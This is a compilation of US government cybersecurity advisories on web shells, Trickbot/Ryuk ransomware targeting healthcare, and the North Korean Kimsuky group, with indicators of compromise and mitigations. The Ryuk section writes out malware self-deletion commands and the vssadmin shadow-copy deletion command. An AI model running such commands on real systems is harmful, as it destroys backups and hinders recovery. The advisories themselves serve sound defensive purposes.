Patch web application vulnerabilities or fix configuration weaknesses that allow web shell attacks, and follow guidance on detecting and preventing web shell malware. NSA & ASD "CyberSecurity Information: Detect and Prevent Web Shell Malware" https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF Malicious cyber actors often deploy web shells—software that can enable remote administration—on a victim’s web server. Malicious cyber actors can use web shells to execute arbitrary system commands commonly sent over HTTP or HTTPS. Attackers often create web shells by adding or modifying a file in an existing web application. Web shells provide attackers with persistent access to a compromised network using communications channels disguised to blend in with legitimate traffic. Web shell malware is a long-standing, pervasive threat that continues to evade many security tools. 

Use multi-factor authentication for administrator accounts

Prioritize protection for accounts with elevated privileges, remote access, or used on high-value assets. https://us-cert.cisa.gov/cdm/event/Identifying-and-Protecting-High-Value-Assets-Closer-Look-Governance-Needs-HVAs Use physical token-based authentication systems to supplement knowledge-based factors such as passwords and personal identification numbers (PINs). NSA "NSA'S Top Ten Cybersecurity Mitigation Strategies" https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf Organizations should migrate away from single-factor authentication, such as password-based systems, which are subject to poor user choices and more susceptible to credential theft, forgery, and password reuse across multiple systems.

Remediate critical web application security risks

First, identify and remediate critical web application security risks. Next, move on to other less critical vulnerabilities. Follow available guidance on securing web applications. NSA “Building Web Applications – Security for Developers” https://apps.nsa.gov/iaarchive/library/ia-guidance/security-tips/building-web-applications-security-recommendations-for.cfm https://owasp.org/www-project-top-ten/ https://cwe.mitre.org/top25/archive/2020/2020_cwe_top25.html

How do I respond to unauthorized access to election-related systems? Implement your security incident response and business continuity plan

It may take time for your organization’s IT professionals to isolate and remove threats to your systems and restore normal operations. In the meantime, take steps to maintain your organization’s essential functions according to your business continuity plan. Organizations should maintain and regularly test backup plans, disaster recovery plans, and business continuity procedures.

Contact CISA or law enforcement immediately 

To report an intrusion and to request incident response resources or technical assistance, contact CISA (Central@cisa.gov or 888-282-0870) or the FBI through a local field office or the FBI’s Cyber Division (CyWatch@ic.fbi.gov or 855-292-3937).

Resources

 

Revisions
  • October 30, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

2020. október 29.

AA20-302A: Ransomware Activity Targeting the Healthcare and Public Health Sector

Original release date: October 28, 2020
Summary

This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) version 7 framework. See the ATT&CK for Enterprise version 7 for all referenced threat actor tactics and techniques.

This joint cybersecurity advisory was coauthored by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Health and Human Services (HHS). This advisory describes the tactics, techniques, and procedures (TTPs) used by cybercriminals against targets in the Healthcare and Public Health Sector (HPH) to infect systems with Ryuk ransomware for financial gain.

CISA, FBI, and HHS have credible information of an increased and imminent cybercrime threat to U.S. hospitals and healthcare providers. CISA, FBI, and HHS are sharing this information to provide warning to healthcare providers to ensure that they take timely and reasonable precautions to protect their networks from these threats.

Click here for a PDF version of this report.

Key Findings
  • CISA, FBI, and HHS assess malicious cyber actors are targeting the HPH Sector with Trickbot malware, often leading to ransomware attacks, data theft, and the disruption of healthcare services.
  • These issues will be particularly challenging for organizations within the COVID-19 pandemic; therefore, administrators will need to balance this risk when determining their cybersecurity investments.
Technical DetailsThreat Details

Since 2016, the cybercriminal enterprise behind Trickbot malware has continued to develop new functionality and tools increasing the ease, speed, and profitability of victimization. What began as a banking trojan and descendant of Dyre malware, now provides its operators a full suite of tools to conduct a myriad of illegal cyber activities. These activities include credential harvesting, mail exfiltration, cryptomining, point-of-sale data exfiltration, and the deployment of ransomware, such as Ryuk. In early 2019, the FBI began to observe new Trickbot modules named Anchor, which cyber actors typically used in attacks targeting high-profile victims—such as large corporations. These attacks often involved data exfiltration from networks and point-of-sale devices. As part of the new Anchor toolset, Trickbot developers created Anchor_DNS, a tool for sending and receiving data from victim machines using Domain Name System (DNS) tunneling.


Anchor_DNS is a backdoor that allows victim machines to communicate with command and control (C2) servers over DNS to evade typical network defense products and make their malicious communications blend in with legitimate DNS traffic. Anchor_DNS uses a single-byte XOR cipher to encrypt its communications, which have been observed using key 0xB9. Once decrypted, the string Anchor_DNS can be found in the DNS request traffic.

Trickbot Indicators of Compromise

After successful execution of the malware, Trickbot copies itself as an executable file with a 12-character (includes .exe), randomly generated file name (e.g. mfjdieks.exe) and places this file in one of the following directories.

  • C:\Windows\
  • C:\Windows\SysWOW64\
  • C:\Users\[Username]\AppData\Roaming\

The malware may also drop a file named anchorDiag.txt in one of the directories listed above.

Prior to initiating communications with the C2 server, the malware uses an infection marker of Global\fde345tyhoVGYHUJKIOuy, typically found in the running memory of the victim machine.

Part of the initial network communications with the C2 server involves sending information about the victim machine such as its computer name/hostname, operating system version, and build via a base64-encoded GUID. The GUID is composed of /GroupID/ClientID/ with the following naming convention:

/anchor_dns/[COMPUTERNAME]_[WindowsVersionBuildNo].[32CharacterString]/.

The malware uses scheduled tasks that run every 15 minutes to ensure persistence on the victim machine. The scheduled task typically uses the following naming convention.

[random_folder_name_in_%APPDATA%_excluding_Microsoft]

autoupdate#[5_random_numbers] (e.g., Task autoupdate#16876).

After successful execution, Anchor_DNS further deploys malicious batch scripts (.bat) using PowerShell commands.

The malware deploys self-deletion techniques by executing the following commands.

  • cmd.exe /c timeout 3 && del C:\Users\[username]\[malware_sample]
  • cmd.exe /C PowerShell \"Start-Sleep 3; Remove-Item C:\Users\[username]\[malware_sample_location]\"

The following domains found in outbound DNS records are associated with Anchor_DNS.

  • kostunivo[.]com
  • chishir[.]com
  • mangoclone[.]com
  • onixcellent[.]com

This malware used the following legitimate domains to test internet connectivity.

  • ipecho[.]net
  • api[.]ipify[.]org
  • checkip[.]amazonaws[.]com
  • ip[.]anysrc[.]net
  • wtfismyip[.]com
  • ipinfo[.]io
  • icanhazip[.]com
  • myexternalip[.]com

The Anchor_DNS malware historically used the following C2 servers.

  • 23[.]95[.]97[.]59
  • 51[.]254[.]25[.]115
  • 193[.]183[.]98[.]66
  • 91[.]217[.]137[.]37
  • 87[.]98[.]175[.]85
Ryuk Ransomware

Typically Ryuk has been deployed as a payload from banking Trojans such as Trickbot. (See the United Kingdom (UK) National Cyber Security Centre (NCSC) advisory, Ryuk Ransomware Targeting Organisations Globally, on their ongoing investigation into global Ryuk ransomware campaigns and associated Emotet and TrickBot malware.) Ryuk first appeared in August 2018 as a derivative of Hermes 2.1 ransomware, which first emerged in late 2017 and was available for sale on the open market as of August 2018. Ryuk still retains some aspects of the Hermes code. For example, all of the files encrypted by Ryuk contain the HERMES tag but, in some infections, the files have .ryuk added to the filename, while others do not. In other parts of the ransomware code, Ryuk has removed or replaced features of Hermes, such as the restriction against targeting specific Eurasia-based systems.

While negotiating the victim network, Ryuk actors will commonly use commercial off-the-shelf products—such as Cobalt Strike and PowerShell Empire—in order to steal credentials. Both frameworks are very robust and are highly effective dual-purpose tools, allowing actors to dump clear text passwords or hash values from memory with the use of Mimikatz. This allows the actors to inject malicious dynamic-link library into memory with read, write, and execute permissions. In order to maintain persistence in the victim environment, Ryuk actors have been known to use scheduled tasks and service creation.

Ryuk actors will quickly map the network in order to enumerate the environment to understand the scope of the infection. In order to limit suspicious activity and possible detection, the actors choose to live off the land and, if possible, use native tools—such as net view, net computers, and ping—to locate mapped network shares, domain controllers, and active directory. In order to move laterally throughout the network, the group relies on native tools, such as PowerShell, Windows Management Instrumentation (WMI), Windows Remote Management , and Remote Desktop Protocol (RDP). The group also uses third-party tools, such as Bloodhound.

Once dropped, Ryuk uses AES-256 to encrypt files and an RSA public key to encrypt the AES key. The Ryuk dropper drops a .bat file that attempts to delete all backup files and Volume Shadow Copies (automatic backup snapshots made by Windows), preventing the victim from recovering encrypted files without the decryption program.

In addition, the attackers will attempt to shut down or uninstall security applications on the victim systems that might prevent the ransomware from executing. Normally this is done via a script, but if that fails, the attackers are capable of manually removing the applications that could stop the attack. The RyukReadMe file placed on the system after encryption provides either one or two email  addresses, using the end-to-end encrypted email provider Protonmail, through which the victim can contact the attacker(s). While earlier versions provide a ransom amount in the initial notifications, Ryuk users are now designating a ransom amount only after the victim makes contact.

The victim is told how much to pay to a specified Bitcoin wallet for the decryptor and is provided a sample decryption of two files.

Initial testing indicates that the RyukReadMe file does not need to be present for the decryption script to run successfully but other reporting advises some files will not decrypt properly without it. Even if run correctly, there is no guarantee the decryptor will be effective. This is further complicated because the RyukReadMe file is deleted when the script is finished. This may affect the decryption script unless it is saved and stored in a different location before running.

According to MITRE, Ryuk uses the ATT&CK techniques listed in table 1.

Table 1: Ryuk ATT&CK techniques

Technique Use System Network Configuration Discovery [T1016] Ryuk has called GetIpNetTable in attempt to identify all mounted drives and hosts that have Address Resolution Protocol entries. 

Masquerading: Match Legitimate Name or Location [T1036.005]

Ryuk has constructed legitimate appearing installation folder paths by calling GetWindowsDirectoryW and then inserting a null byte at the fourth character of the path. For Windows Vista or higher, the path would appear as C:\Users\Public.  Process Injection [T1055] Ryuk has injected itself into remote processes to encrypt files using a combination of VirtualAlloc, WriteProcessMemory, and CreateRemoteThread.  Process Discovery [T1057] Ryuk has called CreateToolhelp32Snapshot to enumerate all running processes.  Command and Scripting Interpreter: Windows Command Shell [T1059.003] Ryuk has used cmd.exe to create a Registry entry to establish persistence.  File and Directory Discovery [T1083] Ryuk has called GetLogicalDrives to enumerate all mounted drives, and GetDriveTypeW to determine the drive type. Native API [T1106] Ryuk has used multiple native APIs including ShellExecuteW to run executables; GetWindowsDirectoryW to create folders; and VirtualAlloc, WriteProcessMemory, and CreateRemoteThread for process injection.  Access Token Manipulation [T1134] Ryuk has attempted to adjust its token privileges to have the SeDebugPrivilege.  Data Encrypted for Impact [T1486] Ryuk has used a combination of symmetric and asymmetric encryption to encrypt files. Files have been encrypted with their own AES key and given a file extension of .RYK. Encrypted directories have had a ransom note of RyukReadMe.txt written to the directory.  Service Stop [T1489] Ryuk has called kill.bat for stopping services, disabling services and killing processes.  Inhibit System Recovery [T1490] Ryuk has used vssadmin Delete Shadows /all /quiet to delete volume shadow copies and vssadmin resize shadowstorage to force deletion of shadow copies created by third-party applications.  Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1047.001] Ryuk has used the Windows command line to create a Registry entry under HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to establish persistence. Impair Defenses: Disable or Modify Tools [T1562.001] Ryuk has stopped services related to anti-virus. Mitigations

For a downloadable copy of IOCs, see AA20-302A.stix.

Plans and Policies

CISA, FBI, and HHS encourage HPH Sector organizations to maintain business continuity plans—the practice of executing essential functions through emergencies (e.g., cyberattacks)—to minimize service interruptions. Without planning, provision, and implementation of continuity principles, organizations may be unable to continue operations. Evaluating continuity and capability will help identify continuity gaps. Through identifying and addressing these gaps, organizations can establish a viable continuity program that will help keep them functioning during cyberattacks or other emergencies. CISA, FBI, and HHS suggest HPH Sector organizations review or establish patching plans, security policies, user agreements, and business continuity plans to ensure they address current threats posed by malicious cyber actors.

Network Best Practices
  • Patch operating systems, software, and firmware as soon as manufacturers release updates.
  • Check configurations for every operating system version for HPH organization-owned assets to prevent issues from arising that local users are unable to fix due to having local administration disabled.
  • Regularly change passwords to network systems and accounts and avoid reusing passwords for different accounts.
  • Use multi-factor authentication where possible.
  • Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs.
  • Implement application and remote access allow listing to only allow systems to execute programs known and permitted by the established security policy.
  • Audit user accounts with administrative privileges and configure access controls with least privilege in mind.
  • Audit logs to ensure new accounts are legitimate.
  • Scan for open or listening ports and mediate those that are not needed.
  • Identify critical assets such as patient database servers, medical records, and teleheatlh and telework infrastructure; create backups of these systems and house the backups offline from the network.
  • Implement network segmentation. Sensitive data should not reside on the same server and network segment as the email environment.
  • Set antivirus and anti-malware solutions to automatically update; conduct regular scans.
Ransomware Best Practices

CISA, FBI and HHS do not recommend paying ransoms. Payment does not guarantee files will be recovered. It may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. In addition to implementing the above network best practices, the FBI, CISA and HHS also recommend the following:

  • Regularly back up data, air gap, and password protect backup copies offline.
  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, secure location.
User Awareness Best Practices
  • Focus on awareness and training. Because end users are targeted, make employees and stakeholders aware of the threats—such as ransomware and phishing scams—and how they are delivered. Additionally, provide users training on information security principles and techniques as well as overall emerging cybersecurity risks and vulnerabilities.
  • Ensure that employees know who to contact when they see suspicious activity or when they believe they have been a victim of a cyberattack. This will ensure that the proper established mitigation strategy can be employed quickly and efficiently.
Recommended Mitigation Measures

System administrators who have indicators of a Trickbot network compromise should immediately take steps to back up and secure sensitive or proprietary data. Trickbot infections may be indicators of an imminent ransomware attack; system administrators should take steps to secure network devices accordingly. Upon evidence of a Trickbot infection, review DNS logs and use the XOR key of 0xB9 to decode XOR encoded DNS requests to reveal the presence of Anchor_DNS, and maintain and provide relevant logs.

GENERAL RANSOMWARE MITIGATIONS — HPH SECTOR

This section is based on CISA and Multi-State Information Sharing and Analysis Center (MS-ISAC)'s Joint Ransomware Guide, which can be found at https://www.cisa.gov/publication/ransomware-guide.

CISA, FBI, and HHS recommend that healthcare organizations implement both ransomware prevention and ransomware response measures immediately.

Ransomware Prevention Join and Engage with Cybersecurity Organizations

CISA, FBI, and HHS recommend that healthcare organizations take the following initial steps:

Engaging with the H-ISAC, ISAO, CISA, FBI, and HHS/HC3 will enable your organization to receive critical information and access to services to better manage the risk posed by ransomware and other cyber threats.

Follow Ransomware Best Practices

Refer to the best practices and references below to help manage the risk posed by ransomware and support your organization’s coordinated and efficient response to a ransomware incident. Apply these practices to the greatest extent possible based on availability of organizational resources.

  • It is critical to maintain offline, encrypted backups of data and to regularly test your backups. Backup procedures should be conducted on a regular basis. It is important that backups be maintained offline or in separated networks as many ransomware variants attempt to find and delete any accessible backups. Maintaining offline, current backups is most critical because there is no need to pay a ransom for data that is readily accessible to your organization.
    • Use the 3-2-1 rule as a guideline for backup practices. The rule states that three copies of all critical data are retained on at least two different types of media and at least one of them is stored offline.
    • Maintain regularly updated “gold images” of critical systems in the event they need to be rebuilt. This entails maintaining image “templates” that include a preconfigured operating system (OS) and associated software applications that can be quickly deployed to rebuild a system, such as a virtual machine or server.
    • Retain backup hardware to rebuild systems in the event rebuilding the primary system is not preferred.
      • Hardware that is newer or older than the primary system can present installation or compatibility hurdles when rebuilding from images.
      • Ensure all backup hardware is properly patched.
  • In addition to system images, applicable source code or executables should be available (stored with backups, escrowed, license agreement to obtain, etc.). It is more efficient to rebuild from system images, but some images will not install on different hardware or platforms correctly; having separate access to needed software will help in these cases.
  • Create, maintain, and exercise a basic cyber incident response plan and associated communications plan that includes response and notification procedures for a ransomware incident.
  • Help your organization better organize around cyber incident response.
  • Develop a cyber incident response plan.
  • The Ransomware Response Checklist, available in the CISA and MS-ISAC Joint Ransomware Guide, serves as an adaptable, ransomware- specific annex to organizational cyber incident response or disruption plans.
  • Review and implement as applicable MITRE’s Medical Device Cybersecurity: Regional Incident Preparedness and Response Playbook (https://www.mitre.org/sites/default/files/publications/pr-18-1550-Medical-Device-Cybersecurity-Playbook.pdf).
  • Develop a risk management plan that maps critical health services and care to the necessary information systems; this will ensure that the incident response plan will contain the proper triage procedures.
  • Plan for the possibility of critical information systems being inaccessible for an extended period of time. This should include but not be limited to the following:
    • Print and properly store/protect hard copies of digital information that would be required for critical patient healthcare.
    • Plan for and periodically train staff to handle the re-routing of incoming/existing patients in an expedient manner if information systems were to abruptly and unexpectedly become unavailable.
    • Coordinate the potential for surge support with other healthcare facilities in the greater local area. This should include organizational leadership periodically meeting and collaborating with counterparts in the greater local area to create/update plans for their facilities to both abruptly send and receive a significant amount of critical patients for immediate care. This may include the opportunity to re-route healthcare employees (and possibly some equipment) to provide care along with additional patients.
  • Consider the development of a second, air-gapped communications network that can provide a minimum standard of backup support for hospital operations if the primary network becomes unavailable if/when needed.
  • Predefine network segments, IT capabilities and other functionality that can either be quickly separated from the greater network or shut down entirely without impacting operations of the rest of the IT infrastructure.
  • Legacy devices should be identified and inventoried with highest priority and given special consideration during a ransomware event.
  • See CISA and MS-ISAC's Joint Ransomware Guide for infection vectors including internet-facing vulnerabilities and misconfigurations; phishing; precursor malware infection; and third parties and managed service providers.
  • HHS/HC3 tracks ransomware that is targeting the HPH Sector; this information can be found at http://www.hhs.gov/hc3.
Hardening Guidance Contact CISA for These No-Cost Resources
  • Information sharing with CISA and MS-ISAC (for SLTT organizations) includes bi-directional sharing of best practices and network defense information regarding ransomware trends and variants as well as malware that is a precursor to ransomware.
  • Policy-oriented or technical assessments help organizations understand how they can improve their defenses to avoid ransomware infection: https://www.cisa.gov/cyber-resource-hub.
    • Assessments include Vulnerability Scanning and Phishing Campaign Assessment.
  • Cyber exercises evaluate or help develop a cyber incident response plan in the context of a ransomware incident scenario.
  • CISA Cybersecurity Advisors (CSAs) advise on best practices and connect you with CISA resources to manage cyber risk.
  • Contacts:
Ransomware Quick References Ransomware Response Checklist

Remember: Paying the ransom will not ensure your data is decrypted or that your systems or data will no longer be compromised. CISA, FBI, and HHS do not recommend paying ransom.

Should your organization be a victim of ransomware, CISA strongly recommends responding by using the Ransomware Response Checklist located in CISA and MS-ISAC's Joint Ransomware Guide, which contains steps for detection and analysis as well as containment and eradication.

Consider the Need For Extended Identification or Analysis
  • If extended identification or analysis is needed, CISA, HHS/HC3, or federal law enforcement may be interested in any of the following information that your organization determines it can legally share:
  • Recovered executable file
  • Copies of the readme file – DO NOT REMOVE the file or decryption may not be possible
  • Live memory (RAM) capture from systems with additional signs of compromise (use of exploit toolkits, RDP activity, additional files found locally)
  • Images of infected systems with additional signs of compromise (use of exploit toolkits, RDP activity, additional files found locally)
  • Malware samples
  • Names of any other malware identified on your system
  • Encrypted file samples
  • Log files (Windows Event Logs from compromised systems, Firewall logs, etc.)
  • Any PowerShell scripts found having executed on the systems
  • Any user accounts created in Active Directory or machines added to the network during the exploitation
  • Email addresses used by the attackers and any associated phishing emails
  • A copy of the ransom note
  • Ransom amount and whether or not the ransom was paid
  • Bitcoin wallets used by the attackers
  • Bitcoin wallets used to pay the ransom (if applicable)
  • Copies of any communications with attackers

Upon voluntary request, CISA can assist with analysis (e.g., phishing emails, storage media, logs, malware) at no cost to support your organization in understanding the root cause of an incident, even in the event additional remote assistance is not requested.

Contact Information

CISA, FBI, and HHS recommend identifying and having on hand the following contact information for ready use should your organization become a victim of a ransomware incident. Consider contacting these organizations for mitigation and response assistance or for purpose of notification.

  • State and Local Response Contacts
  • IT/IT Security Team – Centralized Cyber Incident Reporting
  • State and Local Law Enforcement
  • Fusion Center        
  • Managed/Security Service Providers
  • Cyber Insurance       

To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at Central@cisa.gov.

Additionally, see the CISA and MS-ISAC's Joint Ransomware Guide for information on contacting—and what to expect from contacting—federal asset response contacts and federal threat response contacts.

DISCLAIMER

This document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see https://cisa.gov/tlp.

References Revisions
  • October 28, 2020: Initial version

This product is provided subject to this Notification and this Privacy & Use policy.

2020. október 27.

AA20-301A: North Korean Advanced Persistent Threat Focus: Kimsuky

Original release date: October 27, 2020
Summary

This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) version 7 framework. See the ATT&CK for Enterprise version 7 for all referenced threat actor tactics and techniques.

This joint cybersecurity advisory was coauthored by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the U.S. Cyber Command Cyber National Mission Force (CNMF). This advisory describes the tactics, techniques, and procedures (TTPs) used by North Korean advanced persistent threat (APT) group Kimsuky—against worldwide targets—to gain intelligence on various topics of interest to the North Korean government. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit https://www.us-cert.cisa.gov/northkorea.

This advisory describes known Kimsuky TTPs, as found in open-source and intelligence reporting through July 2020. The target audience for this advisory is commercial sector businesses desiring to protect their networks from North Korean APT activity.

Click here for a PDF version of this report.

Key Findings

This advisory’s key findings are:

  • The Kimsuky APT group has most likely been operating since 2012.
  • Kimsuky is most likely tasked by the North Korean regime with a global intelligence gathering mission.
  • Kimsuky employs common social engineering tactics, spearphishing, and watering hole attacks to exfiltrate desired information from victims.[1],[2]
  • Kimsuky is most likely to use spearphishing to gain initial access into victim hosts or networks.[3]
  • Kimsuky conducts its intelligence collection activities against individuals and organizations in South Korea, Japan, and the United States.
  • Kimsuky focuses its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions.
  • Kimsuky specifically targets:
    • Individuals identified as experts in various fields,
    • Think tanks, and
    • South Korean government entities.[4],[5],[6],[7],[8]
  • CISA, FBI, and CNMF recommend individuals and organizations within this target profile increase their defenses and adopt a heightened state of awareness. Particularly important mitigations include safeguards against spearphishing, use of multi-factor authentication, and user awareness training.
Technical DetailsInitial Access

Kimsuky uses various spearphishing and social engineering methods to obtain Initial Access [TA0001] to victim networks.[9],[10],[11] Spearphishing—with a malicious attachment embedded in the email—is the most observed Kimsuky tactic (Phishing: Spearphishing Attachment [T1566.001]).[12],[13]

  • The APT group has used web hosting credentials—stolen from victims outside of their usual targets—to host their malicious scripts and tools. Kimsuky likely obtained the credentials from the victims via spearphishing and credential harvesting scripts. On the victim domains, they have created subdomains mimicking legitimate sites and services they are spoofing, such as Google or Yahoo mail.[14]
  • Kimsuky has also sent benign emails to targets, which were possibly intended to build trust in advance of a follow-on email with a malicious attachment or link.
    • Posing as South Korean reporters, Kimsuky exchanged several benign interview-themed emails with their intended target to ostensibly arrange an interview date and possibly build rapport. The emails contained the subject line “Skype Interview requests of [Redacted TV Show] in Seoul,” and began with a request to have the recipient appear as a guest on the show. The APT group invited the targets to a Skype interview on the topic of inter-Korean issues and denuclearization negotiations on the Korean Peninsula.
    • After a recipient agreed to an interview, Kimsuky sent a subsequent email with a malicious document, either as an attachment or as a Google Drive link within the body. The document usually contained a variant of BabyShark malware (see the Execution section for information on BabyShark). When the date of the interview drew near, Kimsuky sent an email canceling the interview.
  • Kimsuky tailors its spearphishing and social engineering approaches to use topics relevant to the target, such as COVID-19, the North Korean nuclear program, or media interviews.[15],[16],[17]

Kimsuky’s other methods for obtaining initial access include login-security-alert-themed phishing emails, watering hole attacks, distributing malware through torrent sharing sites, and directing victims to install malicious browser extensions (Phishing: Spearphising Link [T1566.002], Drive-by Compromise [T1189], Man-in-the-Browser [T1185]).[18]

Execution

After obtaining initial access, Kimsuky uses BabyShark malware and PowerShell or the Windows Command Shell for Execution [TA0002].

  • BabyShark is Visual Basic Script (VBS)-based malware.
    • First, the compromised host system uses the native Microsoft Windows utility, mshta.exe, to download and execute an HTML application (HTA) file from a remote system (Signed Binary Proxy Execution: Mshta [T1218.005]).
    • The HTA file then downloads, decodes, and executes the encoded BabyShark VBS file.
    • The script maintains Persistence [TA0003] by creating a Registry key that runs on startup (Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001]).
    •  It then collects system information (System Information Discovery [T1082]), sends it to the operator’s command control (C2) servers, and awaits further commands.[19],[20],[21],[22]
  • Open-source reporting indicates BabyShark is delivered via an email message containing a link or an attachment (see Initial Access section for more information) (Phishing: Spearphising Link [T1566.002], Phishing: Spearphishing Attachment [T1566.001]). Kimsuky tailors email phishing messages to match its targets’ interests. Observed targets have been U.S. think tanks and the global cryptocurrency industry.[23]
  • Kimsuky uses PowerShell to run executables from the internet without touching the physical hard disk on a computer by using the target’s memory (Command and Scripting Interpreter: PowerShell [T1059.001]). PowerShell commands/scripts can be executed without invoking powershell.exe through HTA files or mshta.exe.[24],[25],[26],[27]
Persistence

Kimsuky has demonstrated the ability to establish Persistence [TA0003] through using malicious browser extensions, modifying system processes, manipulating the autostart execution, using Remote Desktop Protocol (RDP), and changing the default file association for an application. By using these methods, Kimsuky can gain login and password information and/or launch malware outside of some application allowlisting solutions.

  • In 2018, Kimsuky used an extension, which was available on the Google Chrome Web Store, to infect victims and steal passwords and cookies from their browsers (Man-in-the-Browser [T1185]). The extension’s reviews gave it a five-star rating, however the text of the reviews applied to other extensions or was negative. The reviews were likely left by compromised Google+ accounts.[28]
  • Kimsuky may install a new service that can execute at startup by using utilities to interact with services or by directly modifying the Registry keys (Boot or Logon Autostart Execution [T1547]). The service name may be disguised with the name from a related operating system function or by masquerading as benign software. Services may be created with administrator privileges but are executed under system privileges, so an adversary can also use a service to escalate privileges from Administrator to System. They can also directly start services through Service Execution.[29],[30]
  • During the STOLEN PENCIL operation in May 2018, Kimsuky used the GREASE malware. GREASE is a tool capable of adding a Windows administrator account and enabling RDP while avoiding firewall rules (Remote Services: Remote Desktop Protocol [T1021.001]).[31]
  • Kimsuky uses a document stealer module that changes the default program associated with Hangul Word Processor (HWP) documents (.hwp files) in the Registry (Event Triggered Execution: Change Default File Association [T1546.001]). Kimsuky manipulates the default Registry setting to open a malicious program instead of the legitimate HWP program (HWP is a Korean word processor). The malware will read and email the content from HWP documents before the legitimate HWP program ultimately opens the document.[32] Kimsuky also targets Microsoft Office users by formatting their documents in a .docx file rather than .hwp and will tailor their macros accordingly.[33]
  • Kimsuky maintains access to compromised domains by uploading actor-modified versions of open-source Hypertext Processor (PHP)-based web shells; these web shells enable the APT actor to upload, download, and delete files and directories on the compromised domains (Server Software Component: Web Shell [T1505.003]). The actor often adds “Dinosaur” references within the modified web shell codes.[34]
Privilege Escalation

Kimsuky uses well-known methods for Privilege Escalation [TA0004]. These methods include placing scripts in the Startup folder, creating and running new services, changing default file associations, and injecting malicious code in explorer.exe.

  • Kimsuky has used Win7Elevate—an exploit from the Metasploit framework—to bypass the User Account Control to inject malicious code into explorer.exe (Process Injection [T1055]). This malicious code decrypts its spying library—a collection of keystroke logging and remote control access tools and remote control download and execution tools—from resources, regardless of the victim’s operating system. It then saves the decrypted file to a disk with a random but hardcoded name (e.g., dfe8b437dd7c417a6d.tmp) in the user’s temporary folder and loads this file as a library, ensuring the tools are then on the system even after a reboot. This allows for the escalation of privileges.[35]
  • Before the injection takes place, the malware sets the necessary privileges (see figure 1). The malware writes the path to its malicious Dynamic Link Library (DLL) and ensures the remote process is loaded by creating a remote thread within explorer.exe (Process Injection [T1055]).[36]

Figure 1: Privileges set for the injection [37]

Defense Evasion

Kimsuky uses well-known and widely available methods for Defense Evasion [TA0005] within a network. These methods include disabling security tools, deleting files, and using Metasploit.[38],[39]

  • Kimsuky’s malicious DLL runs at startup to zero (i.e., turn off) the Windows firewall Registry keys (see figure 2). This disables the Windows system firewall and turns off the Windows Security Center service, which prevents the service from alerting the user about the disabled firewall (see figure 2) (Impair Defenses: Disable or Modify System Firewall [T1562.004]).[40]

Figure 2: Disabled firewall values in the Registry [41]

  • Kimsuky has used a keylogger that deletes exfiltrated data on disk after it is transmitted to its C2 server (Indicator Removal on Host: File Deletion [T1070.004]).[42]
  • Kimsuky has used mshta.exe, which is a utility that executes Microsoft HTAs. It can be used for proxy execution of malicious .hta files and JavaScript or VBS through a trusted windows utility (Signed Binary Proxy Execution: Mshta [T1218.005]). It can also be used to bypass application allow listing solutions (Abuse Elevation Control Mechanism: Bypass User Access Control [T1548.002]).[43],[44]
  • Win7Elevate—which was noted above—is also used to evade traditional security measures. Win7Elevatve is a part of the Metasploit framework open-source code and is used to inject malicious code into explorer.exe (Process Injection [T1055]). The malicious code decrypts its spying library from resources, saves the decrypted file to disk with a random but hardcoded name in the victim's temporary folder, and loads the file as a library.[45],[46],[47]
Credential Access

Kimsuky uses legitimate tools and network sniffers to harvest credentials from web browsers, files, and keyloggers (Credential Access [TA0006]).

  • Kimsuky uses memory dump programs instead of using well-known malicious software and performs the credential extraction offline. Kimsuky uses ProcDump, a Windows command line administration tool, also available for Linux, that allows a user to create crash dumps/core dumps of processes based upon certain criteria, such as high central processing unit (CPU) utilization (OS Credential Dumping [T1003]). ProcDump monitors for CPU spikes and generates a crash dump when a value is met; it passes information to a Word document saved on the computer. It can be used as a general process dump utility that actors can embed in other scripts, as seen by Kimsuky’s inclusion of ProcDump in the BabyShark malware.[48]
  • According to open-source security researchers, Kimsuky abuses a Chrome extension to steal passwords and cookies from browsers (Man-in-the-Browser [T1185]).[49],[50] The spearphishing email directs a victim to a phishing site, where the victim is shown a benign PDF document but is not able to view it. The victim is then redirected to the official Chrome Web Store page to install a Chrome extension, which has the ability to steal cookies and site passwords and loads a JavaScript file, named jQuery.js, from a separate site (see figure 3).[51]

Figure 3: JavaScript file, named jQuery.js [52]

  • Kimsuky also uses a PowerShell based keylogger, named MECHANICAL, and a network sniffing tool, named Nirsoft SniffPass (Input Capture: Keylogging [T1056.001], Network Sniffing [T1040]). MECHANICAL logs keystrokes to %userprofile%\appdata\roaming\apach.{txt,log} and is also a "cryptojacker," which is a tool that uses a victim’s computer to mine cryptocurrency. Nirsoft SniffPass is capable of obtaining passwords sent over non-secure protocols.[53]
